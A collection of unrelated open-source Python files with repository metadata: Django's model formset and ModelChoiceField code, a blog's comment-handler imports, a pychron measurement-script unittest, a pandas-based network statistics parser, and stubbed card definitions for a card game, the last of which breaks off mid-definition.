attrs = {'model': model}
if fields is not None:
attrs['fields'] = fields
if exclude is not None:
attrs['exclude'] = exclude
if widgets is not None:
attrs['widgets'] = widgets
if localized_fields is not None:
attrs['localized_fields'] = localized_fields
if labels is not None:
attrs['labels'] = labels
if help_texts is not None:
attrs['help_texts'] = help_texts
if error_messages is not None:
attrs['error_messages'] = error_messages
if field_classes is not None:
attrs['field_classes'] = field_classes
# If parent form class already has an inner Meta, the Meta we're
# creating needs to inherit from the parent's inner meta.
bases = (form.Meta,) if hasattr(form, 'Meta') else ()
Meta = type('Meta', bases, attrs)
if formfield_callback:
Meta.formfield_callback = staticmethod(formfield_callback)
# Give this new form class a reasonable name.
class_name = model.__name__ + 'Form'
# Class attributes for the new form class.
form_class_attrs = {
'Meta': Meta,
'formfield_callback': formfield_callback
}
if (getattr(Meta, 'fields', None) is None and
getattr(Meta, 'exclude', None) is None):
raise ImproperlyConfigured(
"Calling modelform_factory without defining 'fields' or "
"'exclude' explicitly is prohibited."
)
# Instantiate type(form) in order to use the same metaclass as form.
return type(form)(class_name, (form,), form_class_attrs)
# ModelFormSets ##############################################################
class BaseModelFormSet(BaseFormSet):
"""
A ``FormSet`` for editing a queryset and/or adding new objects to it.
"""
model = None
# Set of fields that must be unique among forms of this set.
unique_fields = set()
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
queryset=None, *, initial=None, **kwargs):
self.queryset = queryset
self.initial_extra = initial
super().__init__(**{'data': data, 'files': files, 'auto_id': auto_id, 'prefix': prefix, **kwargs})
def initial_form_count(self):
"""Return the number of forms that are required in this FormSet."""
if not self.is_bound:
return len(self.get_queryset())
return super().initial_form_count()
def _existing_object(self, pk):
if not hasattr(self, '_object_dict'):
self._object_dict = {o.pk: o for o in self.get_queryset()}
return self._object_dict.get(pk)
def _get_to_python(self, field):
"""
If the field is a related field, fetch the concrete field's (that
is, the ultimate pointed-to field's) to_python.
"""
while field.remote_field is not None:
field = field.remote_field.get_related_field()
return field.to_python
def _construct_form(self, i, **kwargs):
pk_required = i < self.initial_form_count()
if pk_required:
if self.is_bound:
pk_key = '%s-%s' % (self.add_prefix(i), self.model._meta.pk.name)
try:
pk = self.data[pk_key]
except KeyError:
# The primary key is missing. The user may have tampered
# with POST data.
pass
else:
to_python = self._get_to_python(self.model._meta.pk)
try:
pk = to_python(pk)
except ValidationError:
# The primary key exists but is an invalid value. The
# user may have tampered with POST data.
pass
else:
kwargs['instance'] = self._existing_object(pk)
else:
kwargs['instance'] = self.get_queryset()[i]
elif self.initial_extra:
# Set initial values for extra forms
try:
kwargs['initial'] = self.initial_extra[i - self.initial_form_count()]
except IndexError:
pass
form = super()._construct_form(i, **kwargs)
if pk_required:
form.fields[self.model._meta.pk.name].required = True
return form
def get_queryset(self):
if not hasattr(self, '_queryset'):
if self.queryset is not None:
qs = self.queryset
else:
qs = self.model._default_manager.get_queryset()
# If the queryset isn't already ordered we need to add an
# artificial ordering here to make sure that all formsets
# constructed from this queryset have the same form order.
if not qs.ordered:
qs = qs.order_by(self.model._meta.pk.name)
# Removed queryset limiting here. As per discussion re: #13023
# on django-dev, max_num should not prevent existing
# related objects/inlines from being displayed.
self._queryset = qs
return self._queryset
def save_new(self, form, commit=True):
"""Save and return a new model instance for the given form."""
return form.save(commit=commit)
def save_existing(self, form, instance, commit=True):
"""Save and return an existing model instance for the given form."""
return form.save(commit=commit)
def delete_existing(self, obj, commit=True):
"""Deletes an existing model instance."""
if commit:
obj.delete()
def save(self, commit=True):
"""
Save model instances for every form, adding and changing instances
as necessary, and return the list of instances.
"""
if not commit:
self.saved_forms = []
def save_m2m():
for form in self.saved_forms:
form.save_m2m()
self.save_m2m = save_m2m
return self.save_existing_objects(commit) + self.save_new_objects(commit)
save.alters_data = True
def clean(self):
self.validate_unique()
def validate_unique(self):
# Collect unique_checks and date_checks to run from all the forms.
all_unique_checks = set()
all_date_checks = set()
forms_to_delete = self.deleted_forms
valid_forms = [form for form in self.forms if form.is_valid() and form not in forms_to_delete]
for form in valid_forms:
exclude = form._get_validation_exclusions()
unique_checks, date_checks = form.instance._get_unique_checks(exclude=exclude)
all_unique_checks.update(unique_checks)
all_date_checks.update(date_checks)
errors = []
# Do each of the unique checks (unique and unique_together)
for uclass, unique_check in all_unique_checks:
seen_data = set()
for form in valid_forms:
# Get the data for the set of fields that must be unique among the forms.
row_data = (
field if field in self.unique_fields else form.cleaned_data[field]
for field in unique_check if field in form.cleaned_data
)
# Reduce Model instances to their primary key values
row_data = tuple(
d._get_pk_val() if hasattr(d, '_get_pk_val')
# Prevent "unhashable type: list" errors later on.
else tuple(d) if isinstance(d, list)
else d for d in row_data
)
if row_data and None not in row_data:
# if we've already seen it then we have a uniqueness failure
if row_data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_unique_error_message(unique_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
for field in unique_check:
if field in form.cleaned_data:
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(row_data)
# iterate over each of the date checks now
for date_check in all_date_checks:
seen_data = set()
uclass, lookup, field, unique_for = date_check
for form in valid_forms:
# see if we have data for both fields
if (form.cleaned_data and form.cleaned_data[field] is not None and
form.cleaned_data[unique_for] is not None):
# if it's a date lookup we need to get the data for all the fields
if lookup == 'date':
date = form.cleaned_data[unique_for]
date_data = (date.year, date.month, date.day)
# otherwise it's just the attribute on the date/datetime
# object
else:
date_data = (getattr(form.cleaned_data[unique_for], lookup),)
data = (form.cleaned_data[field],) + date_data
# if we've already seen it then we have a uniqueness failure
if data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_date_error_message(date_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(data)
if errors:
raise ValidationError(errors)
def get_unique_error_message(self, unique_check):
if len(unique_check) == 1:
return gettext("Please correct the duplicate data for %(field)s.") % {
"field": unique_check[0],
}
else:
return gettext("Please correct the duplicate data for %(field)s, which must be unique.") % {
"field": get_text_list(unique_check, _("and")),
}
def get_date_error_message(self, date_check):
return gettext(
"Please correct the duplicate data for %(field_name)s "
"which must be unique for the %(lookup)s in %(date_field)s."
) % {
'field_name': date_check[2],
'date_field': date_check[3],
'lookup': str(date_check[1]),
}
def get_form_error(self):
return gettext("Please correct the duplicate values below.")
def save_existing_objects(self, commit=True):
self.changed_objects = []
self.deleted_objects = []
if not self.initial_forms:
return []
saved_instances = []
forms_to_delete = self.deleted_forms
for form in self.initial_forms:
obj = form.instance
# If the pk is None, it means either:
# 1. The object is an unexpected empty model, created by invalid
# POST data such as an object outside the formset's queryset.
# 2. The object was already deleted from the database.
if obj.pk is None:
continue
if form in forms_to_delete:
self.deleted_objects.append(obj)
self.delete_existing(obj, commit=commit)
elif form.has_changed():
self.changed_objects.append((obj, form.changed_data))
saved_instances.append(self.save_existing(form, obj, commit=commit))
if not commit:
self.saved_forms.append(form)
return saved_instances
def save_new_objects(self, commit=True):
self.new_objects = []
for form in self.extra_forms:
if not form.has_changed():
continue
# If someone has marked an add form for deletion, don't save the
# object.
if self.can_delete and self._should_delete_form(form):
continue
self.new_objects.append(self.save_new(form, commit=commit))
if not commit:
self.saved_forms.append(form)
return self.new_objects
def add_fields(self, form, index):
"""Add a hidden field for the object's primary key."""
from django.db.models import AutoField, OneToOneField, ForeignKey
self._pk_field = pk = self.model._meta.pk
# If a pk isn't editable, then it won't be on the form, so we need to
# add it here so we can tell which object is which when we get the
# data back. Generally, pk.editable should be false, but for some
# reason, auto_created pk fields and AutoField's editable attribute is
# True, so check for that as well.
def pk_is_not_editable(pk):
return (
(not pk.editable) or (pk.auto_created or isinstance(pk, AutoField)) or (
pk.remote_field and pk.remote_field.parent_link and
pk_is_not_editable(pk.remote_field.model._meta.pk)
)
)
if pk_is_not_editable(pk) or pk.name not in form.fields:
if form.is_bound:
# If we're adding the related instance, ignore its primary key
# as it could be an auto-generated default which isn't actually
# in the database.
pk_value = None if form.instance._state.adding else form.instance.pk
else:
try:
if index is not None:
pk_value = self.get_queryset()[index].pk
else:
pk_value = None
except IndexError:
pk_value = None
if isinstance(pk, (ForeignKey, OneToOneField)):
qs = pk.remote_field.model._default_manager.get_queryset()
else:
qs = self.model._default_manager.get_queryset()
qs = qs.using(form.instance._state.db)
if form._meta.widgets:
widget = form._meta.widgets.get(self._pk_field.name, HiddenInput)
else:
widget = HiddenInput
form.fields[self._pk_field.name] = ModelChoiceField(qs, initial=pk_value, required=False, widget=widget)
super().add_fields(form, index)
def modelformset_factory(model, form=ModelForm, formfield_callback=None,
formset=BaseModelFormSet, extra=1, can_delete=False,
can_order=False, max_num=None, fields=None, exclude=None,
widgets=None, validate_max=False, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
min_num=None, validate_min=False, field_classes=None):
"""Return a FormSet class for the given Django model class."""
meta = getattr(form, 'Meta', None)
if (getattr(meta, 'fields', fields) is None and
getattr(meta, 'exclude', exclude) is None):
raise ImproperlyConfigured(
"Calling modelformset_factory without defining 'fields' or "
"'exclude' explicitly is prohibited."
)
form = modelform_factory(model, form=form, fields=fields, exclude=exclude,
formfield_callback=formfield_callback,
widgets=widgets, localized_fields=localized_fields,
labels=labels, help_texts=help_texts,
error_messages=error_messages, field_classes=field_classes)
FormSet = formset_factory(form, formset, extra=extra, min_num=min_num, max_num=max_num,
can_order=can_order, can_delete=can_delete,
validate_min=validate_min, validate_max=validate_max)
FormSet.model = model
return FormSet
# InlineFormSets #############################################################
class BaseInlineFormSet(BaseModelFormSet):
"""A formset for child objects related to a parent."""
def __init__(self, data=None, files=None, instance=None,
save_as_new=False, prefix=None, queryset=None, **kwargs):
if instance is None:
self.instance = self.fk.remote_field.model()
else:
self.instance = instance
self.save_as_new = save_as_new
if queryset is None:
queryset = self.model._default_manager
if self.instance.pk is not None:
qs = queryset.filter(**{self.fk.name: self.instance})
else:
qs = queryset.none()
self.unique_fields = {self.fk.name}
super().__init__(data, files, prefix=prefix, queryset=qs, **kwargs)
# Add the generated field to form._meta.fields if it's defined to make
# sure validation isn't skipped on that field.
if self.form._meta.fields and self.fk.name not in self.form._meta.fields:
if isinstance(self.form._meta.fields, tuple):
self.form._meta.fields = list(self.form._meta.fields)
self.form._meta.fields.append(self.fk.name)
def initial_form_count(self):
if self.save_as_new:
return 0
return super().initial_form_count()
def _construct_form(self, i, **kwargs):
form = super()._construct_form(i, **kwargs)
if self.save_as_new:
mutable = getattr(form.data, '_mutable', None)
# Allow modifying an immutable QueryDict.
if mutable is not None:
form.data._mutable = True
# Remove the primary key from the form's data, we are only
# creating new instances
form.data[form.add_prefix(self._pk_field.name)] = None
# Remove the foreign key from the form's data
form.data[form.add_prefix(self.fk.name)] = None
if mutable is not None:
form.data._mutable = mutable
# Set the fk value here so that the form can do its validation.
fk_value = self.instance.pk
if self.fk.remote_field.field_name != self.fk.remote_field.model._meta.pk.name:
fk_value = getattr(self.instance, self.fk.remote_field.field_name)
fk_value = getattr(fk_value, 'pk', fk_value)
setattr(form.instance, self.fk.get_attname(), fk_value)
return form
@classmethod
def get_default_prefix(cls):
return cls.fk.remote_field.get_accessor_name(model=cls.model).replace('+', '')
def save_new(self, form, commit=True):
# Ensure the latest copy of the related instance is present on each
# form (it may have been saved after the formset was originally
# instantiated).
setattr(form.instance, self.fk.name, self.instance)
return super().save_new(form, commit=commit)
def add_fields(self, form, index):
super().add_fields(form, index)
if self._pk_field == self.fk:
name = self._pk_field.name
kwargs = {'pk_field': True}
else:
# The foreign key field might not be on the form, so we poke at the
# Model field to get the label, since we need that for error messages.
name = self.fk.name
kwargs = {
'label': getattr(form.fields.get(name), 'label', capfirst(self.fk.verbose_name))
}
# The InlineForeignKeyField assumes that the foreign key relation is
# based on the parent model's pk. If this isn't the case, set to_field
# to correctly resolve the initial form value.
if self.fk.remote_field.field_name != self.fk.remote_field.model._meta.pk.name:
kwargs['to_field'] = self.fk.remote_field.field_name
# If we're adding a new object, ignore a parent's auto-generated key
# as it will be regenerated on the save request.
if self.instance._state.adding:
if kwargs.get('to_field') is not None:
to_field = self.instance._meta.get_field(kwargs['to_field'])
else:
to_field = self.instance._meta.pk
if to_field.has_default():
setattr(self.instance, to_field.attname, None)
form.fields[name] = InlineForeignKeyField(self.instance, **kwargs)
def get_unique_error_message(self, unique_check):
unique_check = [field for field in unique_check if field != self.fk.name]
return super().get_unique_error_message(unique_check)
def _get_foreign_key(parent_model, model, fk_name=None, can_fail=False):
"""
Find and return the ForeignKey from model to parent if there is one
(return None if can_fail is True and no such field exists). If fk_name is
provided, assume it is the name of the ForeignKey field. Unless can_fail is
True, raise an exception if there isn't a ForeignKey from model to
parent_model.
"""
# avoid circular import
from django.db.models import ForeignKey
opts = model._meta
if fk_name:
fks_to_parent = [f for f in opts.fields if f.name == fk_name]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
if not isinstance(fk, ForeignKey) or \
(fk.remote_field.model != parent_model and
fk.remote_field.model not in parent_model._meta.get_parent_list()):
raise ValueError(
"fk_name '%s' is not a ForeignKey to '%s'." % (fk_name, parent_model._meta.label)
)
elif not fks_to_parent:
raise ValueError(
"'%s' has no field named '%s'." % (model._meta.label, fk_name)
)
else:
# Try to discover what the ForeignKey from model to parent_model is
fks_to_parent = [
f for f in opts.fields
if isinstance(f, ForeignKey) and (
f.remote_field.model == parent_model or
f.remote_field.model in parent_model._meta.get_parent_list()
)
]
if len(fks_to_parent) == 1:
fk = fks_to_parent[0]
elif not fks_to_parent:
if can_fail:
return
raise ValueError(
"'%s' has no ForeignKey to '%s'." % (
model._meta.label,
parent_model._meta.label,
)
)
else:
raise ValueError(
"'%s' has more than one ForeignKey to '%s'." % (
model._meta.label,
parent_model._meta.label,
)
)
return fk
def inlineformset_factory(parent_model, model, form=ModelForm,
formset=BaseInlineFormSet, fk_name=None,
fields=None, exclude=None, extra=3, can_order=False,
can_delete=True, max_num=None, formfield_callback=None,
widgets=None, validate_max=False, localized_fields=None,
labels=None, help_texts=None, error_messages=None,
min_num=None, validate_min=False, field_classes=None):
"""
Return an ``InlineFormSet`` for the given kwargs.
``fk_name`` must be provided if ``model`` has more than one ``ForeignKey``
to ``parent_model``.
"""
fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
# enforce a max_num=1 when the foreign key to the parent model is unique.
if fk.unique:
max_num = 1
kwargs = {
'form': form,
'formfield_callback': formfield_callback,
'formset': formset,
'extra': extra,
'can_delete': can_delete,
'can_order': can_order,
'fields': fields,
'exclude': exclude,
'min_num': min_num,
'max_num': max_num,
'widgets': widgets,
'validate_min': validate_min,
'validate_max': validate_max,
'localized_fields': localized_fields,
'labels': labels,
'help_texts': help_texts,
'error_messages': error_messages,
'field_classes': field_classes,
}
FormSet = modelformset_factory(model, **kwargs)
FormSet.fk = fk
return FormSet
# Fields #####################################################################
class InlineForeignKeyField(Field):
"""
A basic integer field that deals with validating the given value to a
given parent instance in an inline.
"""
widget = HiddenInput
default_error_messages = {
'invalid_choice': _('The inline value did not match the parent instance.'),
}
def __init__(self, parent_instance, *args, pk_field=False, to_field=None, **kwargs):
self.parent_instance = parent_instance
self.pk_field = pk_field
self.to_field = to_field
if self.parent_instance is not None:
if self.to_field:
kwargs["initial"] = getattr(self.parent_instance, self.to_field)
else:
kwargs["initial"] = self.parent_instance.pk
kwargs["required"] = False
super().__init__(*args, **kwargs)
def clean(self, value):
if value in self.empty_values:
if self.pk_field:
return None
# if there is no value act as we did before.
return self.parent_instance
# ensure the we compare the values as equal types.
if self.to_field:
orig = getattr(self.parent_instance, self.to_field)
else:
orig = self.parent_instance.pk
if str(value) != str(orig):
raise ValidationError(self.error_messages['invalid_choice'], code='invalid_choice')
return self.parent_instance
def has_changed(self, initial, data):
return False
class ModelChoiceIterator:
def __init__(self, field):
self.field = field
self.queryset = field.queryset
def __iter__(self):
if self.field.empty_label is not None:
yield ("", self.field.empty_label)
queryset = self.queryset
# Can't use iterator() when queryset uses prefetch_related()
if not queryset._prefetch_related_lookups:
queryset = queryset.iterator()
for obj in queryset:
yield self.choice(obj)
def __len__(self):
# count() adds a query but uses less memory since the QuerySet results
# won't be cached. In most cases, the choices will only be iterated on,
# and __len__() won't be called.
return self.queryset.count() + (1 if self.field.empty_label is not None else 0)
def __bool__(self):
return self.field.empty_label is not None or self.queryset.exists()
def choice(self, obj):
return (self.field.prepare_value(obj), self.field.label_from_instance(obj))
class ModelChoiceField(ChoiceField):
"""A ChoiceField whose choices are a model QuerySet."""
# This class is a subclass of ChoiceField for purity, but it doesn't
# actually use any of ChoiceField's implementation.
default_error_messages = {
'invalid_choice': _('Select a valid choice. That choice is not one of'
' the available choices.'),
}
iterator = ModelChoiceIterator
def __init__(self, queryset, *, empty_label="---------",
required=True, widget=None, label=None, initial=None,
help_text='', to_field_name=None, limit_choices_to=None,
**kwargs):
if required and (initial is not None):
self.empty_label = None
else:
self.empty_label = empty_label
# Call Field instead of ChoiceField __init__() because we don't need
# ChoiceField.__init__().
Field.__init__(
self, required=required, widget=widget, label=label,
initial=initial, help_text=help_text, **kwargs
)
self.queryset = queryset
self.limit_choices_to = limit_choices_to # limit the queryset later.
self.to_field_name = to_field_name
def get_limit_choices_to(self):
"""
Return ``limit_choices_to`` for this form field.
If it is a callable, invoke it and return the result.
"""
if callable(self.limit_choices_to):
return self.limit_choices_to()
return self.limit_choices_to
def __deepcopy__(self, memo):
result = super(ChoiceField, self).__deepcopy__(memo)
# Need to force a new ModelChoiceIterator to be created, bug #11183
if self.queryset is not None:
result.queryset = self.queryset.all()
return result
def _get_queryset(self):
return self._queryset
def _set_queryset(self, queryset):
self._queryset = None if queryset is None else queryset.all()
self.widget.choices = self.choices
queryset = property(_get_queryset, _set_queryset)
# this method will be used to create object labels by the QuerySetIterator.
# Override it to customize the label.
def label_from_instance(self, obj):
"""
Convert objects into strings and generate the labels for the choices
presented by this object. Subclasses can override this method to
customize the display of the choices.
"""
return str(obj)
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh ModelChoiceIterator that has not been
# consumed. Note that we're instantiating a new ModelChoiceIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return self.iterator(self)
choices = property(_get_choices, ChoiceField._set_choices)
def prepare_value(self, value):
if hasattr(value, '_meta'):
if self.to_field_name:
return value.serializable_value(self.to_field_name)
else:
return value.pk
return super().prepare_value(value)
def to_python(self, value):
if value in self.empty_values:
return None
try:
key = self.to_field_name or 'pk'
value = self.queryset.get(**{key: value})
except (ValueError, TypeError, self.queryset.model.DoesNotExist):
raise ValidationError(self.error_messages['invalid_choice'], code='invalid_choice')
return value
def validate(self, value):
return Field.validate(self, value)
def has_changed(self, initial, data):
if self.disabled:
return False
initial_value = initial if initial is not None else ''
data_value = data if data is not None else ''
return str(self.prepare_value(initial_value)) != str(data_value)
class ModelMultipleChoiceField(ModelChoiceField):
"""A MultipleChoiceField whose choices are a model QuerySet."""
widget = SelectMultiple
hidden_widget = MultipleHiddenInput
default_error_messages = {
'list': _('Enter a list of values.'),
'invalid_choice': _('Select a valid choice. %(value)s is not one of the'
' available choices.'),
'invalid_pk_value': _('"%(pk)s" is not a valid value.')
}
def __init__(self, queryset, **kwargs):
super().__init__(queryset, empty_label=None, **kwargs)
def to_python(self, value):
if not value:
return []
return list(self._check_values(value))
def clean(self, value):
value = self.prepare_value(value)
if self.required and not value:
raise ValidationError(self.error_messages['required'], code='required')
elif not self.required and not value:
return self.queryset.none()
if not isinstance(value, (list, tuple)):
raise ValidationError(self.error_messages['list'], code='list')
qs = self._check_values(value)
# Since this overrides the inherited ModelChoiceField.clean
# we run custom validators here
self.run_validators(value)
return qs
def _check_values(self, value):
"""
Given a list of possible PK values, return a QuerySet of the
corresponding objects. Raise a ValidationError if a given value is
invalid (not a valid PK, not in the queryset, etc.)
"""
key = self.to_field_name or 'pk'
# deduplicate given values to avoid creating many querysets or
# requiring the database backend deduplicate efficiently.
try:
value = frozenset(value)
except TypeError:
# list of lists isn't hashable, for example
raise ValidationError(
self.error_messages['list'],
code='list',
)
for pk in value:
try:
self.queryset.filter(**{key: pk})
except (ValueError, TypeError):
raise ValidationError(
self.error_messages['invalid_pk_value'],
code='invalid_pk_value',
params={'pk': pk},
)
qs = self.queryset.filter(**{'%s__in' % key: value})
pks = {str(getattr(o, key)) for o in qs}
for val in value:
if str(val) not in pks:
raise ValidationError(
self.error_messages['invalid_choice'],
code='invalid_choice',
params={'value': val},
)
return qs
def prepare_value(self, value):
if (hasattr(value, '__iter__') and
not isinstance(value, str) and
not hasattr(value, '_meta')):
prepare_value = super().prepare_value
return [prepare_value(v) for v in value]
return super().prepare_value(value)
def has_changed(self, initial, data):
if self.disabled:
return False
if initial is None:
initial = []
if data is None:
data = []
if len(initial) != len(data):
return True
initial_set = {str(value) for value in self.prepare_value(initial)}
data_set = {str(value) for value in data}
return data_set != initial_set
def modelform_defines_fields(form_class):
return hasattr(form_class, '_meta') and (
form_class._meta.fields is not None or
form_class._meta.exclude is not None
)
| {
"content_hash": "d608fe22abfc92e9874dd919e64ab5dc",
"timestamp": "",
"source": "github",
"line_count": 1360,
"max_line_length": 116,
"avg_line_length": 41.28382352941176,
"alnum_prop": 0.5847789691162327,
"repo_name": "sametmax/Django--an-app-at-a-time",
"id": "fe8a67ed2bb5d5d5cd4d6fa8b5a2aafb4303eac4",
"size": "56146",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ignore_this_directory/django/forms/models.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "76288"
},
{
"name": "HTML",
"bytes": "145951"
},
{
"name": "JavaScript",
"bytes": "118055"
},
{
"name": "Python",
"bytes": "4824263"
}
],
"symlink_target": ""
} |
from create import CommentNewHandler
from delete import CommentDeleteHandler
from edit import CommentEditHandler | {
"content_hash": "308a9ce1b9a8429322dc072a804e58d7",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 39,
"avg_line_length": 37.333333333333336,
"alnum_prop": 0.9017857142857143,
"repo_name": "brusznicki/multi-user-blog",
"id": "783ee33d9108e931175eef710e558ec5f76feb44",
"size": "112",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "handlers/comment/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "361"
},
{
"name": "HTML",
"bytes": "11722"
},
{
"name": "Python",
"bytes": "21746"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from pychron.core.ui import set_qt
set_qt()
__author__ = "ross"
import unittest
import os
from pychron.pyscripts.measurement_pyscript import (
MeasurementPyScript,
MeasurementCTXObject,
)
class DocstrContextTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.script = MeasurementPyScript()
p = "pychron/pyscripts/tests/data/measurement_script.txt"
if not os.path.isfile(p):
p = "./data/measurement_script.txt"
with open(p, "r") as rfile:
cls.script.text = rfile.read()
cls.script.bootstrap()
cls.script.setup_context()
def test_mx(self):
self.assertIsInstance(self.script._ctx["mx"], MeasurementCTXObject)
def test_mx_multicollect_counts(self):
self.assertEqual(self.script._ctx["mx"].multicollect.counts, 5)
def test_mx_baseline_counts(self):
self.assertEqual(self.script._ctx["mx"].baseline.counts, 3)
class InterpolationTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.script = MeasurementPyScript()
cls.script.bootstrap()
p = "pychron/pyscripts/tests/data/script_options.yaml"
if not os.path.isfile(p):
p = "./data/script_options.yaml"
cls.script.interpolation_path = p
def test_warm_cdd(self):
v = self.script.warm_cdd
self.assertEqual(v, False)
def test_float(self):
v = self.script.float_value
self.assertIsInstance(v, float)
def test_fail_attr(self):
# v = self.script.novalue
# self.assertIsNone(v)
self.assertRaises(AttributeError, lambda: self.script.novalue)
def test_execute_snippet(self):
snippet = """def main(): a= float_value+2"""
v = self.script.execute_snippet(snippet)
self.assertIs(v, None)
# snippet = '''def main(): a= float_value+boo*bat'''
# v = self.script.execute_snippet(snippet)
# self.assertIs(v, None)
def test_execute_snippet_fail(self):
snippet = """def main(): a= float_valufe+2"""
v = self.script.execute_snippet(snippet)
self.assertIsInstance(v, str)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "b72bf4c31dbf0ac4287eee3073db7676",
"timestamp": "",
"source": "github",
"line_count": 79,
"max_line_length": 75,
"avg_line_length": 28.582278481012658,
"alnum_prop": 0.6328609388839681,
"repo_name": "NMGRL/pychron",
"id": "06f76b2b2ca65ba309a03bff472760e24c237569",
"size": "2258",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "pychron/pyscripts/tests/measurement_pyscript.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "128"
},
{
"name": "C++",
"bytes": "3706"
},
{
"name": "CSS",
"bytes": "263"
},
{
"name": "Cython",
"bytes": "1692"
},
{
"name": "Fortran",
"bytes": "455875"
},
{
"name": "HTML",
"bytes": "46796"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Processing",
"bytes": "11421"
},
{
"name": "Python",
"bytes": "10773692"
},
{
"name": "Shell",
"bytes": "1003"
}
],
"symlink_target": ""
} |
"""
@author: xuk1
@license: (C) Copyright 2013-2017
@contact: [email protected]
@file: network.py
@time: 8/17/2017 12:55
@desc:
"""
import numpy as np
import pandas as pd
from component.base import CommonBase
class Network(CommonBase):
"""
Node network attribute, phasing network data from original PAT file
"""
used_col = ['HostName', 'TimeStamp', 'IFACE', 'rxkB/s', 'txkB/s']
converter = {col: np.float32 for col in used_col[3:]}
def __init__(self, file_path):
self.file_path = file_path
def get_data_by_time(self, start, end):
"""
get average value of this attribute and all raw data within the start and end timestamp.
if start and end all equal to [0] will calculate all the data.
:param start: list of start timestamp
:param end: list of end timestamp, should be the same length of start
:return: dict that contains avg value of all the timestamp pair and all raw data
"""
df = pd.read_csv(self.file_path, delim_whitespace=True, usecols=self.used_col, header=0)
df = df[df['IFACE'] != 'lo'].reset_index(drop=True)
all_row = list(df['TimeStamp'].str.contains('TimeStamp'))
num_nics = all_row.index(True) # num of NICs
name_nics = df['IFACE'].loc[0:num_nics - 1]
for num in range(num_nics):
if name_nics[num] == 'lo': # drop local nic
name_nics = name_nics.drop(num)
break
df = df[df['TimeStamp'] != 'TimeStamp'] # drop rows from df that contains 'TimeStamp'
pd.to_datetime(df['TimeStamp'], unit='s')
df = df.set_index('TimeStamp').astype(self.converter)
avg = []
if start[0] == end[0] == 0: # calc all the data
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each NICs
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
if len(start) == 1:
return avg, df
else:
for i in range(1, len(start)): # calc the data within the pair of time period
# raw_all.append(df.loc[str(start[i]): str(end[i])])
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.loc[str(start[i]): str(end[i])].iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each NICs
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
return avg, df
for i in range(len(start)): # calc the data within the pair of time period
# raw_all.append(df.loc[str(start[i]): str(end[i])])
nic_avg = pd.DataFrame()
for num in range(num_nics): # processing each nic
nic_data = df.loc[str(start[i]): str(end[i])].iloc[num:len(all_row):num_nics]
tmp = nic_data.iloc[:, 2:].mean(axis=0) # average of each nics
nic_avg = nic_avg.append(tmp, ignore_index=True)
avg.append(nic_avg.sum(axis=0)) # sum of all the averaged NICs
return avg, df
| {
"content_hash": "908cb68b7a2a1e5297867c2205765ab5",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 101,
"avg_line_length": 46.03896103896104,
"alnum_prop": 0.5528913963328632,
"repo_name": "kaiseu/pat-data-processing",
"id": "d06c60e6287f73b5b77eb7835fe7764aa33a777f",
"size": "3583",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "component/network.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "63970"
}
],
"symlink_target": ""
} |
from cardboard import types
from cardboard.ability import (
AbilityNotImplemented, spell, activated, triggered, static
)
from cardboard.cards import card, common, keywords, match
@card("Phantasmal Dragon")
def phantasmal_dragon(card, abilities):
def phantasmal_dragon():
return AbilityNotImplemented
def phantasmal_dragon():
return AbilityNotImplemented
return phantasmal_dragon, phantasmal_dragon,
@card("Trollhide")
def trollhide(card, abilities):
def trollhide():
return AbilityNotImplemented
def trollhide():
return AbilityNotImplemented
return trollhide, trollhide,
@card("Chasm Drake")
def chasm_drake(card, abilities):
def chasm_drake():
return AbilityNotImplemented
def chasm_drake():
return AbilityNotImplemented
return chasm_drake, chasm_drake,
@card("Stingerfling Spider")
def stingerfling_spider(card, abilities):
def stingerfling_spider():
return AbilityNotImplemented
def stingerfling_spider():
return AbilityNotImplemented
return stingerfling_spider, stingerfling_spider,
@card("Arbalest Elite")
def arbalest_elite(card, abilities):
def arbalest_elite():
return AbilityNotImplemented
return arbalest_elite,
@card("Stave Off")
def stave_off(card, abilities):
def stave_off():
return AbilityNotImplemented
return stave_off,
@card("Crumbling Colossus")
def crumbling_colossus(card, abilities):
